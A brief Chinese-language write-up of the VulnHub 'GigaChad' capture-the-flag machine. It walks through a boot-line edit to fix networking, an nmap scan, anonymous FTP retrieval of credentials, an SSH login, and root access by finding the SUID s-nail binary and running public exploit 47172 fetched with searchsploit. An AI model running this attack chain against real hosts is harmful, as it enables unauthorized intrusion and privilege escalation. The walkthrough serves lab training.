靶机地址:http://www.vulnhub.com/entry/gigachad-1,657/
首先,解决虚拟机无法分配ip
在启动界面按e
将此处的ro quiet替换为rw signie init=/bin/bash
cat /etc/network/interfaces
nano /etc/network/interfaces
/etc/init.d/networking restart
然后修改下网卡配置文件,将enp0s3改为ens33
nmap -sV -sC -A -p- 192.168.2.161
使用kali进行扫描
根据nmap的信息,存在ftp匿名登陆
ftp 192.168.2.161//存在匿名登陆,账户:ftp
ftp> ls//随后发现有个文件,将它get下来
ftp> get chadinfo
cat chadinfo
file chadinfo
unzip chadinfo
cat chadinfo
这边有点没看懂为啥,搜了下别人的解析
ssh chad@192.168.2.161
cat user.txt//成功得到第一个flag
find / -perm -u=s -type f 2>/dev/null //命令将尝试查找具有root权限的SUID的文件
chad@gigachad:/tmp$ s-nail -V
v14.8.6
searchsploit s-nail
cd /tmp
searchsploit -m 47172
scp /tmp/47172.sh chad@192.168.2.161:/tmp
版本号也符合要求
chmod 777
./47172.sh//多执行几次就成功了
id
cd /root
cat root.txt//得到第二个flag